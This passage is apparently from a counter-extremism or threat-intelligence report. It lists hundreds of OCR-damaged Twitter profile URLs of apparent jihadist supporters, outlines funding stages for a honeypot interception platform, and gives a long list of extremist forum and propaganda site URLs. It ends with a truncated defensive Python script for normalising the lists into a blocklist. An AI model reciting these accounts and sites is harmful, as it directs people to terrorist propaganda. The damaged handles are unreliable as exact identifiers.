• https://twitter.com/AbclAllahGaza 

• https://twitter.com/khilafah01 _ 

• https://twitter.com/iislamicl2 




• https://twitter.com/ajmurgent 

• https://twitter.com/baqiya79R 

• https://twitter.com/abujamalucleen02 

• https://twitter.com/ibn _abcliqany 

• https://twitter.eom/killercat600 

• https://twitter.com/MisciFromTheD 
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• https://twitter.com/3aam_AI _Diri 

• https://twitter.com/mnhtye 

• https://twitter.com/block_151 

• https://twitter.com/Hijazi _9111 

• https://twitter.com/ibn _clyala93 

• https://twitter.com/jxcjcjl 

• https://twitter.com/mosalmal991 

• https://twitter.com/rfvb7 

• https://twitter.eom/alaserlOO 

• https://twitter.eom/ascl4000hcl 

• https://twitter.com/AbclAllahGaza 

• https://twitter.com/MhclSayf 

• https://twitter.com/aqaqlqa 




• https://twitter.com/mhuncl231 

• https://twitter.com/azclyisis55 

• https://twitter.com/Baghclacl9191 

• https://twitter.com/74ghl 

• https://twitter.com/nnbb77881 

• https://twitter.eom/a _t _ _29 _ _7a 

• https://twitter.com/Kh_nsal43 

• https://twitter.com/theykillmybro 

• https://twitter.com/210Bircly 

• https://twitter.com/claish90 

• https://twitter.eom/A_A_c 

• https://twitter.com/soman611 

• https://twitter.com/qwerwoow 

• https://twitter.com/fojraqqa 

• https://twitter.com/saegr2 

• https://twitter.com/ezzislamm 




• https://twitter.com/ach3ari _maliki 

• https://twitter.com/Ansar5433 
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• https://twitter.com/waja__l 

• https://twitter.com/lslamic _3344 

• https://twitter.com/0j7jl (doe 

• https://twitter.com/zeses2 

• https://twitter.com/abu _a _89 

• https://twitter.com/medad_medl 

• https://twitter.com/block_151 

• https://twitter.com/Alkurdil995 

• https://twitter.com/haydra2233 

• https://twitter.com/Asirat _Tunisial 

• https://twitter.com/Rouba56 

• https://twitter.com/KA_ll7 

• https://twitter.com/bwwwg 

• https://twitter.com/aljabri354 

• https://twitter.com/msaks241 

• https://twitter.com/wffffll089 




• https://twitter.com/Djjjdjd4

• https://twitter.com/parislNHELL

• https://twitter.com/llll32llll

• https://twitter.com/Daaeem51

• https://twitter.com/malekaty891

• https://twitter.com/mouwa7ed_03

• https://twitter.com/sunnahthlOOO

• https://twitter.com/R_nxxt_l

• https://twitter.com/qq_qq_79

• https://twitter.com/rkrk4m25

• https://twitter.com/OT_lll57

• https://twitter.com/Migrant2Allah

• https://twitter.com/adgrl9

• https://twitter.com/Njd__zz77zz

• https://twitter.com/Hhgff26176827

• https://twitter.com/OOUItraOO

• https://twitter.com/rkrk4m26

• https://twitter.com/rkrk4m27

• https://twitter.com/rkrk4m28

• https://twitter.com/rkrk4m29

• https://twitter.com/rkrk4m30

• https://twitter.com/rkrk4m31

• https://twitter.com/rkrk4m32

• https://twitter.com/kaj__s

• https://twitter.com/ABu_AIAylnaa

• https://twitter.com/ABO_SLEMAN_9

• https://twitter.com/cl_mf33

• https://twitter.com/Turbo_zahicl

• https://twitter.com/ww_cvf

• https://twitter.com/IITIIillTII

• https://twitter.com/CF_G66

• https://twitter.com/abujuuacl

• https://twitter.com/isis_2277

• https://twitter.com/Ascll5Wreg

• https://twitter.com/abcclfghjkll2

• https://twitter.com/71AprVISHV18VIP

• https://twitter.com/Ha23ra3F987

• https://twitter.com/UiU_o_UiU

• https://twitter.com/isuwh

• https://twitter.com/lll__Heart

• https://twitter.com/Sabaa760

• https://twitter.com/zajell8

• https://twitter.com/clockwise75

• https://twitter.com/gjclfoi221qw

• https://twitter.com/smjh2154

• https://twitter.com/Aymanjrjr2

• https://twitter.com/khatabb66

• https://twitter.com/sor_hall

• https://twitter.com/isis_1188

• https://twitter.com/allmah89

• https://twitter.com/j3x_w8p

• https://twitter.com/iplee4

• https://twitter.com/isis_3344

• https://twitter.com/nor964432

• https://twitter.com/Turbo_113

• https://twitter.com/ivfkfj2

• https://twitter.com/Clh9ML

• https://twitter.com/157aboismail

• https://twitter.com/cmdmmxl

• https://twitter.com/RxdctfvDtfhj

• https://twitter.com/zhranylOO

• https://twitter.com/kalldd345

• https://twitter.com/invasion44

• https://twitter.com/26anneza3

• https://twitter.com/Gareeeb45

• https://twitter.com/baqya520

• https://twitter.com/fbdfberberber

• https://twitter.com/treraqqa

• https://twitter.com/talwtalbghdadyl

• https://twitter.com/M_m_m_m_2000

• https://twitter.com/alsloulistupid

• https://twitter.com/Aleeeiiii4444

• https://twitter.com/MatarMurad

• https://twitter.com/GMC_IS

• https://twitter.com/Diteslavrit4

• https://twitter.com/abou_walaal2

• https://twitter.com/LLAA554

• https://twitter.com/safeallah425

• https://twitter.com/kinght78ag

• https://twitter.com/Bdjdjdl6

• https://twitter.com/lk_32_state

• https://twitter.com/hjfkdsll

• https://twitter.com/Om_0said_63

• https://twitter.com/kurdish22_22

• https://twitter.com/AzdiSayil

• https://twitter.com/ahmedx360xl8

• https://twitter.com/HuChuin_63

• https://twitter.com/parisonourfire

• https://twitter.com/20Trewq

• https://twitter.com/gkgjfufjc

• https://twitter.com/humaninnocence

• https://twitter.com/monaserl56

• https://twitter.com/muriidil2

• https://twitter.com/poompaiii

• https://twitter.com/muslim_13_

• https://twitter.com/ahmadkhloofll5

• https://twitter.com/Masl24an

• https://twitter.com/ahmedmahmoudil2

• https://twitter.com/dfghujuiytrr

• https://twitter.com/mejedklm

• https://twitter.com/f73071755

• https://twitter.com/clyalla72

• https://twitter.com/sa7awetbuslim04

• https://twitter.com/TP57iQ3ICAGgKzV

• https://twitter.com/mohammeclsz6

• https://twitter.com/1993Agmacll993

• https://twitter.com/Bbsswwnn

• https://twitter.com/almnasron4

• https://twitter.com/bar_bell

• https://twitter.com/ManguAilon55

• https://twitter.com/moclie_50

• https://twitter.com/Njcl_qt78is

• https://twitter.com/Gehaaaclll22

• https://twitter.com/blacli_00alaslam

• https://twitter.com/fallujhal

• https://twitter.com/AboFareecllO

• https://twitter.com/manerlancl

• https://twitter.com/abo_a_94

• https://twitter.com/3Abouwalicl

• https://twitter.com/bakreebeeko_5

• https://twitter.com/3lill87

• https://twitter.com/Alnablsy97

• https://twitter.com/G6A77

• https://twitter.com/The0bserver91

• https://twitter.com/6cccg2

• https://twitter.com/ISIS_HER01

• https://twitter.com/ZZzBXqHOymuBANK

• https://twitter.com/teamsystemclz

• https://twitter.com/vbhgxclfc

• https://twitter.com/bhCotn

• https://twitter.com/maktaba_1

• https://twitter.com/osama_claml

• https://twitter.com/fata_almosel

• https://twitter.com/xxmm4455777

• https://twitter.com/abujalaall

• https://twitter.com/Waseemalsaucli

• https://twitter.com/Khlifa27al2

• https://twitter.com/AbiclaGina

• https://twitter.com/Ansar_DawlalO

• https://twitter.com/yesteyesic4

• https://twitter.com/lieffejongen

• https://twitter.com/MohammeclAtta22

• https://twitter.com/Ticaal90

• https://twitter.com/AliAclenalSomali

• https://twitter.com/ns45678

• https://twitter.com/AbouShahacleh

• https://twitter.com/jihaclil0744139

• https://twitter.com/abohamzaalturki

• https://twitter.com/JoniManm

• https://twitter.com/omarl985741

• https://twitter.com/see00012

• https://twitter.com/almuhajerBackup

• https://twitter.com/saclking23

• https://twitter.com/qwttplly

• https://twitter.com/k42isisa

• https://twitter.com/clhxhsvcl2

• https://twitter.com/77nb_

• https://twitter.com/dawlajokers

• https://twitter.com/monaser0017

• https://twitter.com/dawlawialg671

• https://twitter.com/fahadeyad62

• https://twitter.com/btr333btr4

• https://twitter.com/vrjevvel

• https://twitter.com/Hhdhdgl

• https://twitter.com/GF98LKI

• https://twitter.com/dola24687

• https://twitter.com/Talal_Q30

• https://twitter.com/muslimmouwahed8

• https://twitter.com/8itismesalman

• https://twitter.com/kubuiman03v

• https://twitter.com/jihadiuser58

• https://twitter.com/PARRIS_951

• https://twitter.com/isis_1144

• https://twitter.com/SyariahlSlight8

• https://twitter.com/meek_don

• https://twitter.com/yotorg

• https://twitter.com/facebookaccoun2

• https://twitter.com/nseem066

• https://twitter.com/AnsarAd98

• https://twitter.com/ieshabaqea

• https://twitter.com/batist550

• https://twitter.com/aassddffa833

• https://twitter.com/madridi4good

• https://twitter.com/nor92331

• https://twitter.com/lEINusral

• https://twitter.com/jJjJjj_5577

• https://twitter.com/strange566

• https://twitter.com/gp2126

• https://twitter.com/pp62068813

• https://twitter.com/_N__

• https://twitter.com/Uddjdnl

• https://twitter.com/kathebwll

• https://twitter.com/bbgg75157900

• https://twitter.com/Ramal5202

• https://twitter.com/J_l_T_E_M_

• https://twitter.com/mohamed_zainab4

• https://twitter.com/ChicbnmAbn

• https://twitter.com/Tr8_K0

• https://twitter.com/eng__sr

• https://twitter.com/gjjkjtogfffclr

• https://twitter.com/Om_khatabb

• https://twitter.com/ubj_k

• https://twitter.com/KhilafahDawah5

• https://twitter.com/AbuDharlslancli7

• https://twitter.com/ixcncnl

• https://twitter.com/anaelclora30

• https://twitter.com/mazenhapne

• https://twitter.com/qwtpllry

• https://twitter.com/Dabiiq7

• https://twitter.com/A05462492

• https://twitter.com/Hmocle5556Www

• https://twitter.com/3MlagD01

• https://twitter.com/meclitato

• https://twitter.com/ukhtiaishal

• https://twitter.com/abccll23456789a7

• https://twitter.com/abou_amina37

• https://twitter.com/AmonMame

• https://twitter.com/0o8000o8001

• https://twitter.com/Abu_Bin_Fartin

• https://twitter.com/marscls98zahrany

• https://twitter.com/_ihsen_086_

• https://twitter.com/33Khilafa

• https://twitter.com/gajhfjfcl

• https://twitter.com/0baycl6Wevrw

• https://twitter.com/0o00ooq

• https://twitter.com/e30isisa

• https://twitter.com/41invasion

• https://twitter.com/OplS75

• https://twitter.com/K_H_034

• https://twitter.com/h90_6

• https://twitter.com/know_paris

• https://twitter.com/saeul7

• https://twitter.com/anjemchouclary

• https://twitter.com/tnt502tnt502

• https://twitter.com/AbuFullaan9th

• https://twitter.com/gmailco69426226

• https://twitter.com/0wais_51

• https://twitter.com/mohamecl20607

• https://twitter.com/mecl_syr_ira91

• https://twitter.com/muslim_libi

• https://twitter.com/muahiecl_7

• https://twitter.com/qqeqq00111

• https://twitter.com/ahmecll4377

• https://twitter.com/aabuyosif

• https://twitter.com/vip444662

• https://twitter.com/clgsclg00712420

• https://twitter.com/kabugezo

• https://twitter.com/AbulslamlS1990

• https://twitter.com/mafel_65

• https://twitter.com/AbuHafsaBritani

• https://twitter.com/Ahmaclkhalf2012

• https://twitter.com/YourOwnBroll6

• https://twitter.com/ReportersOOO

• https://twitter.com/TurMedia318

• https://twitter.com/GermanyUnderAtk

• https://twitter.com/WakeUp_MV

• https://twitter.com/BushrallJS

• https://twitter.com/jabalybaraa

• https://twitter.com/s_2017_

• https://twitter.com/frm450

• https://twitter.com/gogoaag82

• https://twitter.com/xxx__800

• https://twitter.com/pe0jnv39mvnf

• https://twitter.com/lslamArmy01

• https://twitter.com/g8670062_8

• https://twitter.com/yyf_hallo

• https://twitter.com/elAFX9kbARBByHv

• https://twitter.com/lba559721

• https://twitter.com/del_elremahl

• https://twitter.com/isisom61

• https://twitter.com/ldififkkl

• https://twitter.com/makdicil970

• https://twitter.com/mahsudll7

• https://twitter.com/K_A_S_E_R_5

• https://twitter.com/lmaqdese

• https://twitter.com/nour_umm

• https://twitter.com/5aq5qDGpNsr4IDU

• https://twitter.com/AbdMouwahid

• https://twitter.com/gaza9310

• https://twitter.com/Jfdlbk

• https://twitter.com/Elkhelafa_Now

• https://twitter.com/jazaerl2254477

• https://twitter.com/lssamSayari

• https://twitter.com/Abo_mhdi29

• https://twitter.com/moedker01

• https://twitter.com/hafeedl001

• https://twitter.com/Yamani_5

• https://twitter.com/alsumoudl7

• https://twitter.com/nbnl000

• https://twitter.com/khilafahinfos

• https://twitter.com/teagouchl

• https://twitter.com/aaallaaallaaa__

• https://twitter.com/onclayiwillkilly

• https://twitter.com/DjibrilParisi

• https://twitter.com/aawwss_22

• https://twitter.com/DolawiyahJo6

• https://twitter.com/gfcl6064

• https://twitter.com/ansaarl32

• https://twitter.com/clrwaleecl5253

• https://twitter.com/ajnacl55

• https://twitter.com/inbes3

• https://twitter.com/asauclicowclonkey

• https://twitter.com/zxzx321zxzx

• https://twitter.com/UmmAbclallah89

• https://twitter.com/arabhty

• https://twitter.com/Asirat_hraminl9

• https://twitter.com/EhliSunneti3

• https://twitter.com/salilbnim

• https://twitter.com/Saifjazraawi

• https://twitter.com/ablo3zaml2

• https://twitter.com/frost0023

• https://twitter.com/uiopup

• https://twitter.com/Kassar_lam

• https://twitter.com/gmccccclO

• https://twitter.com/clrherhclfbclrhclhs

• https://twitter.com/JUI_LJ

• https://twitter.com/snipern433

• https://twitter.com/Ffhfbfbl

• https://twitter.com/Almohajer_103

• https://twitter.com/oummoucljahicl

• https://twitter.com/ahmaclsaicl91

Detailed Project Funding Stages Information 

The initial stage of the project will consist of the selective and timely purchase of all necessary appliances, including the localization and acquisition of fake-Web-site honeypot solutions and the acquisition of the network assets needed to place those honeypots. 

• The main objective of the initial phase is to acquire all the equipment needed to set up the foundations of the Obmonix platform. The equipment will be acquired in a timely fashion, relying largely on a selected set of proprietary, industry-leading contacts. 

• The main objective of the next phase is to ensure that the equipment is placed in a secure location and properly maintained, so that the operator is capable of running the Obmonix platform securely. 

• The main objective of the next phase is to establish the foundations of the world's largest data set of intelligence data, so that the Obmonix platform is capable of intercepting and processing the necessary data. 

• The main objective of the next phase is to acquire the proprietary service-based solutions that give the operator the tools needed to intercept and process that data. 

• The main objective of the last phase is to intercept and process the world's largest data set of cybercrime and cyber jihad data. 

Sample Cyber Jihad Forums: 

• http://rion2005.100free.com 

• http://2s2s.com 

• http://abo-ali.com 

• http://Aboalqaqa.blogspot.com 

• http://aboaumir.modawanati.com 

• http://abomoath.ahlablog.com 

• http://abomosab-s.110mb.com 

• http://abu-hadi.net 

• http://abu-qatada.com 

• http://abubaraa.co.uk 

• http://abujibriel.com 

• http://aekhlaas.com 

• http://aekhlaas.net 

• http://ahlu-tawheed.com 

• http://al3aren.com/vb/index.php 

• http://al3wda.com/vb/index.php 

• http://al-amanh.net 

• http://al-ansar.net 

• http://al-boraq.info 

• http://al-boraq.org 

• http://al-busyrol.info 

• http://al-busyro.info 

• http://al-ekhlaas.net 

• http://al-ekhlaas.net/forum 

• http://al-ekhlaas.org 

• http://al-faloja.com 

• http://al-faloja.info/vb/index.php 

• http://al-farooq.net 

• http://al-jahafal.com/vb 

• http://al-kafkaz.com 

• http://al-mustaqbal.net 

• http://al-nour.net 

• http://al-ommh.net 

• http://al-qimmah.net 

• http://al-rashedeen.info 

• http://al-tamkeen.com 

• http://al-yemen.org 

• http://alahed.org 

• http://alamer.biz/ameer/home.html 

• http://alanbar.topgoo.net 

• http://alanssar.net 

• http://alaseb.com 

• http://albasrah.net/index.php 

• http://albawaba.com 

• http://albayan.co.uk 

• http://albayanislamac.com 

• http://albetaqa.com 

• http://alboraq.info 

• http://Alboraq.info/forum 

• http://alboraqforum.info 

• http://albtar.ltalk.net/index.htm 

• http://albusyro.info 

• http://albuxoriy.com 

• http://alekhlaas.com 

• http://alekhlaas.info 

• http://alekhlaas.net 

• http://alekhlaas.org 

• http://alemaral.org 

• http://alemarah.org 

• http://alfajrtaqni.net 

• http://alfetn.com 

• http://alfida.jeeran.com 

• http://alfidaa.biz 

• http://alfidaa.info/vb 

• http://alfidaa.org/vb 

• http://alforqan.ingoo.us 

• http://alfurq4n.org 

• http://algyshalmnsur.r8.org 

• http://AlHanein.com 

• http://AlHesbah.net 

• http://AlHesbah.org 

• http://alifati.wordpress.com 

• http://alintiqad.com 

• http://aljazeeratalk.net/forum/ 

• http://aljazeeratalk.net/portal 

• http://alkhelafa.eu 

• http://allah4ever.hi5.com 

• http://almaqdese.net 

• http://almaqreze.net 

• http://almaqreze.net/ar 

• http://almedad.com/vb 

• http://almnbr.net/vb 

• http://almob2.com 

• http://almobshrat.net 

• http://almokhtsar.com 

• http://almqdes.net 

• http://almubarakradio.com 

• http://Alnakshabandia-army.com 

• http://alnakshabandia-army.org/home 

• http://Alneda.com 

• http://Alnour.hyperphp.com 

• http://alnour.hyperphp.com/vb 

• http://Alnusra.net 

• http://alnusrra.net 

• http://alokab.com 

• http://alokab.com/forums/lofiversion 

• http://alqassam.ps 

• http://alqoqaz.net 

• http://alquds.co.uk 

• http://alrafdean.org 

• http://alraiah.net 

• http://Alsaha.com 

• http://alshahid.org 

• http://alsomod-iea.info 

• http://alsomod.com 

• http://alsunnah.info 

• http://altabetoun.110mb.com 

• http://altarefe.com 

• http://altawbah.net/vb 

• http://altaybeh.net 

• http://alweya.com 

• http://an-najah.net 

• http://anashid.ru 

• http://Anbaar.net 

• http://anjemchoudary.co.uk 

• http://ansal.info 

• http://ansaaar.com 

• http://ansarl.info 

• http://ansarll.org 

• http://ansar-alhaqq.net 

• http://ansar-jihad.net 

• http://ansar.tv 

• http://Ansarnet.ws 

• http://ansharulislam.com 

• http://anti-majos.com 

• http://antiliberalnews.com 

• http://antydetroidmichigan.blog.onet.pl 

• http://aqeeda2008.maktoobblog.com 

• http://aqlislamiccenter.com 

• http://arrahmah.com 

• http://asadl01.jeeran.com 

• http://asaeb.net 

• http://asaebweb.com 

• http://asd813.maktoobblog.com 

• http://atahadii.com/vb 

• http://Azzam.com 

• http://azzammedia.com 

• http://azzammedia.net 

• http://bab-ul-islam.net 

• http://baghdadsniper.net 

• http://bintjbeil.com 

• http://bumisyam.com 

• http://cageprisoners.com 

• http://cageuk.org 

• http://chechensinsyria.com 

• http://ClearGuidance.com 

• http://clearinghous.infovlad.net 

• http://cyberkov.com 

• http://czeczenia.blog.onet.pl 

• http://d-sunnah.net 

• http://dakwahmedia.net 

• http://darelhadi.com 

• http://daruhilafe.com 

• http://darultavhid.com 

• http://daulahislamiyah.net 

• http://daulahislamiyyah.com 

• http://dawaalhaq.com 

• http://dawatehaq.net 

• http://dawla-is.cf 

• http://dd-sunnah.net/forum/index.php 

• http://dhiqar.net 

• http://dinhaqq.info 

• http://doguturkistanbulteni.com 

• http://dr-algzouli.com 

• http://dr-mahmoud.com 

• http://drbj.net 

• http://duniaterkini.com 

• http://dwl-is.appspot.com 

• http://dyoul991.maktoobblog.com 

• http://e-kl-s.info 

• http://e-kl-s.net 

• http://egysite.com/al2nsar 

• http://ek-ls.org 

• http://ekhlaas.biz 

• http://ekhlaas.cc 

• http://ekhlaas.com 

• http://ekhlaas.info 

• http://ekhlaas.net 

• http://ekhlaas.org 

• http://ekhlaas.ws 

• http://el-tewhid.com 

• http://eldorar.com 

• http://elmanara.org 

• http://Elshouraa.ws/vb 

• http://eltwhed.110mb.com 

• http://eltwhed.110mb.com/homepage.htm 

• http://enfalmedya.com 

• http://eramuslim.com 

• http://eraqeidawlh.maktoobblog.com 

• http://f2008h.maktoobblog.com 

• http://falestiny.net 

• http://falloja.blogspot.com 

• http://farouqomar.net 

• http://fatehforums.com 

• http://fidaal.net/vb 

• http://fisyria.info 

• http://forum.hawaaworld.com 

• http://forum.saraya.ps 

• http://forums.ikhwan.net/t 

• http://forums.naseej.com 

• http://fpi.or.id 

• http://fursan-al-iraq.over-blog.com 

• http://g-elshmal.com/vb/index.php 

• http://generalvekalat.org 

• http://ghaaly.com 

• http://ghaliboun.net 

• http://gimfmedia.com/tech 

• http://gulf-up.com 

• http://gurmad.info 

• http://h-alali.net 

• http://halabnews.com 

• http://halifat.info 

• http://halifat.org 

• http://hamas.ps 

• http://hamasaliraq.com 

• http://hamasiraq.org 

• http://hanein.info 

• http://hanein.info/vb 

• http://hanein.info/vb/forum.php 

• http://harb-net.com/vb 

• http://harunyahya.com 

• http://healthl.maktoobblog.com 

• http://hewar.khayma.com 

• http://heyetnet.org 

• http://hidayatullah.com 

• http://hizb-afghanistan.com 

• http://hizb-america.org 

• http://hizb-australia.org 

• http://hizb-eastafrica.com 

• http://hizb-pakistan.com 

• http://hizb-russia.info 

• http://hizb-turkiston.net 

• http://hizb-turkiye.org 

• http://hizb-ut-tahrir-almaghreb.info 

• http://hizb-ut-tahrir.dk 

• http://hizb-ut-tahrir.info 

• http://hizb-ut-tahrir.org 

• http://hizb-ut-tahrir.se 

• http://hizb-uzbekistan.info 

• http://hizb.org.ua 

• http://hizb.org.uk 

• http://Hizbollah.org 

• http://hizbollah.tv 

• http://hizbut-tahrir.or.id 

• http://hizbuttahrir.info 

• http://hizbuttahrir.org 

• http://ht-afghanistan.org 

• http://ht-bangladesh.info 

• http://ht-tunisie.info 

• http://htmedia.info 

• http://alboraqmedia.org 

• http://alekhlaas.cc 

• http://alweehdat.com/vb 

• http://Hussamaldin.jeeran.com 

• http://iaisite-eng.org 

• http://iaisite.biz 

• http://iaisite.info 

• http://iaisite.info/index.php 

• http://iaisite.net 

• http://iaisite.org 

• http://iczkeria.blog.onet.pl 

• http://ikhwan.net 

• http://imamtv.com 

• http://infovlad.net/mirror_alansar_alsunnah 

• http://invitetoislam.com 

• http://invitetoislam.org 

• http://iraq-war.ru 

• http://iraqiasaeb.org 

• http://iraqipa.net 

• http://iraqirabita.org.uk 

• http://iraqiyoon.com 

• http://iraqpatrol.com 

• http://iraqpatrol.com/php 

• http://isdarat-tube.com 

• http://isdarat.org 

• http://isdarat.tv 

• http://isecurlty.com 

• http://islahhaber.net 

• http://islam-iea.com 

• http://islamdaveti.com 

• http://islamdevleti.info 

• http://islamdevleti.org 

• http://islamdin.com 

• http://islamdin.net 

• http://islamic-dw.com 

• http://islamic-f.net/vb 

• http://islamic-state.ga 

• http://islamic-state.media 

• http://islamicawakening.com 

• http://islamicdigest.net 

• http://islamiciraq.maktoobblog.com 

• http://islamiciraq.modawanati.com 

• http://islamicstate.media 

• http://islamicstate.pro 

• http://islamicsupremecouncil.org 

• http://islammemo.cc 

• http://islampos.com 

• http://islamqa.info 

• http://islamway.com 

• http://isnews.net 

• http://j-aliraq.net 

• http://jaami.info 

• http://jaber-m-b.maktoobblog.com 

• http://jaber-mb.maktoobblog.com 

• http://jabhtnosra.appspot.com 

• http://jaishabibaker.net 

• http://jamaatshariat.com/ru 

• http://jamahirl.ps 

• http://jamatdawa.com 

• http://jamatdawa.org 

• http://jannatoshiqlari.net 

• http://jehadway.7olm.org 

• http://jihadmin.com 

• http://jnoub.org 

• http://JondurRahmaan.com 

• http://jsc-web.net/vb 

• http://kabardeyonline.org/tr/index_tr.htm 

• http://kafilahmujahid.com 

• http://kafkaz.maktoobblog.com 

• http://Kataeb-20.org 

• http://kataeb-20.org/main 

• http://kataibaqssa.com/forum/index.php 

• http://kataibaqssa.com/newarab 

• http://kavkaz.org.uk 

• http://kavkaz.tv 

• http://kavkazcenter.com 

• http://kavkazcenter.info 

• http://kavkazcenter.net 

• http://kavkazchat.com 

• http://kavkazjihad.com 

• http://khabarpana.com 

• http://khaleelstyle.com 

• http://khelafa.org 

• http://khilafa.org 

• http://khilafah-archives.com 

• http://khilafah.com 

• http://khilafah.net 

• http://khilafat.dk 

• http://kiblat.net 

• http://kirkuk.kalamfikalam.com 

• http://kokludegisim.net 

• http://ktb-20.com 

• http://Kwaflislam.com 

• http://kwaflislam.com/vb/index.php 

• http://ladn.maktoobblog.com 

• http://lakii.com 

• http://land-alsham.com 

• http://lasdipo.com 

• http://liputan-kita.com 

• http://m3ark.com 

• http://mail.ek-ls.org 

• http://Majahd.quickbb.net 

• http://majahd.quickbb.net/index.htm 

• http://majahden.com 

• http://majelismujahidi.com 

• http://majles.alukah.net 

• http://maktoobblog.com 

• http://manbar.me 

• http://maqrezeradio.net 

• http://marsad.net 

• http://mediaislam.ucoz.ru 

• http://medicine2001.maktoobblog.com 

• http://mhesne.com 

• http://mitv.moy.su 

• http://mnbr.info 

• http://mobasher.110mb.com 

• http://moj-irq.com 

• http://montada.yaqen.net 

• http://moqavemat.com 

• http://moqawama.org 

• http://moqawama.tv 

• http://moqawmh.com 

• http://morasl.maktoobblog.com 

• http://mujahideenarmy.com 

• http://muntada.sawtalummah.com 

• http://muqawamah.com 

• http://muslimdaily.net 

• http://muslimprisoners.com 

• http://muslimuzbekistan.net 

• http://musim.net 

• http://musim.net/vb 

• http://musim.org 

• http://muvahhid.info 

• http://muwahhid.info 

• http://muwahideen.co.nr 

• http://myhesbah.net 

• http://mykhilafah.com 

• http://mymy.my-goo.net/index.htm 

• http://nahimunkar.com 

• http://nasrollah.org 

• http://Nasrunminallah.net 

• http://nepras.ps 

• http://news.stcom.net 

• http://nkusa.org 

• http://nmayd.com 

• http://nuruddin.4bb.ru 

• http://nusraah.com 

• http://old.kavkazcenter.com 

• http://omar-abdrahman.110mb.com 

• http://pal-is.net/vb 

• http://paldf.net 

• http://paldf.net/forum 

• http://palestine-info.com 

• http://palestinegallery.com 

• http://palestinianforum.net 

• http://palir.net 

• http://panjimas.com 

• http://pda.kavkaz.tv 

• http://profetensummah.com 

• http://qassam-rockets.skyrock.com 

• http://qassam.ps 

• http://qudsnews.net 

• http://qyemen.com 

• http://radioalfurqaan.com 

• http://radioandalus24.com 

• http://radyotevhid.com 

• http://ramaadi.ltalk.net/index.htm 

• http://rawadalmaly.com/vb 

• http://reformandjihadfront.org 

• http://revolution.muslimpad.com 

• http://rjfront.info 

• http://rjfront.org 

• http://Rmadi.top-me.com 

• http://saadarmy.com 

• http://saaid.net 

• http://sadcom.montadamoslim.com 

• http://salaf-us-saalih.com 

• http://Salafia.balder.prohosting.com 

• http://salafiah.com 

• http://salafimediauk.com 

• http://salam-online.com 

• http://samirkuntar.org 

• http://saraya.ps 

• http://Sarayaalquds.org 

• http://Sarayasaad.com 

• http://save-islam.com 

• http://Sawtaljihad.org 

• http://sawtalummah.com 

• http://se-te.com 

• http://shabakataljahad.com 

• http://shahamat-arabic.com 

• http://shahamat-english.com 

• http://shahamat-farsi.com 

• http://shahamat-movie.com 

• http://shahamat-urdu.com 

• http://shamikhl.info 

• http://shamilonline.org/rusnya/index_ru.htm 

• http://sharia4indonesia.com 

• http://Shiaweb.org 

• http://shiaweb.org/hizbulla/index.html 

• http://Shmo5allslam.net 

• http://shoutussalam.org 

• http://skaba.ps 

• http://Sobhank.com 

• http://sobhank.com/vb 

• http://somalimemo.net 

• http://somod.org 

• http://soutalhaq.net 

• http://Soutweb.100free.com 

• http://sqr-al3rb.com 

• http://suara-islam.com 

• http://sunnahcare.com 

• http://sunnahonline.com 

• http://suwaidan.com 

• http://swalif.net 

• http://syamina.com 

• http://syamorganizer.com 

• http://tahrir-syria.info 

• http://tajdeed.org.uk 

• http://takvahaber.net 

• http://tarani.info 

• http://Tawhed.ws 

• http://tevhiddergisi.com 

• http://tevhiddersleri.com 

• http://tevhididavet.com 

• http://tevhidgundem.net 

• http://theshamnews.com 

• http://thethirdjihad.com 

• http://thoriquna.com 

• http://thoriquwna.com 

• http://toorabora.org 

• http://turkhackteam.org 

• http://twelvershia.net 

• http://uicforce.co.vu 

• http://ummah.com 

• http://ummahislam.com 

• http://ummetislam.info 

• http://ummetislam.net 

• http://vb999.maktoobblog.com 

• http://vb.fpnp.net 

• http://vb.roro44.com/index.php 

• http://vd.ag 

• http://vdagestan.com 

• http://voa-islam.com 

• http://W-N-N.net 

• http://Wa3ad.org 

• http://wa3iarabi.com 

• http://wa7at.org/vb 

• http://wap.kavkaz.tv 

• http://worldakhbar.com 

• http://worldnet.ws 

• http://worldnet.ws/radio/index.html 

• http://worldnet.ws/vb 

• http://yenidenislam.com 

• http://zad-muslim.com 

• http://zaeerl.22web.net 

• http://zaidhamid.pk 

• http://zuheerl7.maktoobblog.com 
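Before either of the two lists above (the Twitter profile URLs and the forum URLs) goes into a blocklist or a SIEM lookup, it needs to be normalised: the extraction left duplicates, case variants, stray spaces and look-alike damage such as `twitter.eom`, and a blocklist that silently swallows those is worse than one that refuses them. The script below is an added example, not code from the original post; it extracts and validates handles against Twitter's own rules (1 to 15 characters, letters, digits and underscore), folds forum URLs down to a lower-cased hostname, deduplicates both, and routes anything that fails validation to a review list instead of dropping it. `SAMPLE_LINES` is a constructed slice of the lists, with a few deliberately damaged variants; `KNOWN_TLDS` is an assumption (the TLDs that occur on the page), not an authoritative list.

```python
"""Normalise and sanity-check a pasted indicator dump such as the Twitter
profile and forum URL lists above, so the result can be loaded into a
blocklist or a SIEM lookup without duplicates or OCR debris.

Added example: this is not code from the original post.  SAMPLE_LINES is a
constructed slice of the lists above, plus variants carrying the kind of
extraction damage seen in them ('.eom', stray spaces, 'i<' for 'k')."""
import re
from urllib.parse import urlsplit

# Twitter handle rules: 1-15 characters, letters, digits and underscore only.
HANDLE_RE = re.compile(r"^[A-Za-z0-9_]{1,15}$")
# Hostname labels: alphanumerics and hyphens, no leading/trailing hyphen.
HOST_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$")
# Assumption: TLDs that occur in the lists above.  Anything else is reported
# for review rather than trusted, which is how 'twitter.eom' gets caught.
KNOWN_TLDS = {"com", "net", "org", "info", "biz", "cc", "tv", "ws", "ps", "eu",
              "ru", "pl", "su", "me", "pk", "uk", "id", "dk", "se", "ua", "nr",
              "cf", "ga", "vu", "media", "pro", "ag", "us"}

# Constructed sample input (not the full page list).
SAMPLE_LINES = """
• https://twitter.com/nedalo9314
• https://twitter.com/rkrk4m25
• https://twitter.com/rkrk4m25
• https://twitter.com/Rkrk4m25
• https://twitter.eom/killercat600
• https://twitter.com/198 _mazen
• https://twitter.com/abccll23456789a7
• http://alboraq.info
• http://Alboraq.info/forum
• http://abubaraa.co.ui<
• http://worldnet.ws/vb
• http://worldnet.ws/radio/index.html
"""


def classify(line):
    """Return ('twitter', handle), ('host', hostname), ('suspect', raw) or None.

    Entries that violate the handle or hostname rules are reported, not
    silently dropped: in an OCR-damaged dump those are the ones that need a
    manual look before they go anywhere near a blocklist.
    """
    raw = line.strip().lstrip("•").strip()
    if not raw:
        return None
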